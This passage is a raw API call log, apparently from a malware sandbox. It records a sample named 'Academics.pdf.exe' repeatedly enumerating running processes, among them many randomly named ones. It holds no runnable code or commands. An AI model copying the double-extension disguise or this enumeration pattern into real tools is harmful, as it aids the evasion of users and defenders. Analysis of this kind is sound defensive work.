th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0321.323] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0321.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0321.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0321.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0321.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0321.328] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0321.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0321.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0321.330] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0321.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0321.332] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0321.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0321.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0321.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0321.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0321.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0321.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0321.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0321.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0321.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0321.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0321.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0321.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0321.344] CloseHandle (hObject=0x294) returned 1 [0321.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.344] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.344] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.345] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.346] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0321.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0321.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0321.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0321.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0321.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0321.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0321.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0321.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0321.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0321.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0321.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0321.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0321.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0321.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0321.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0321.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 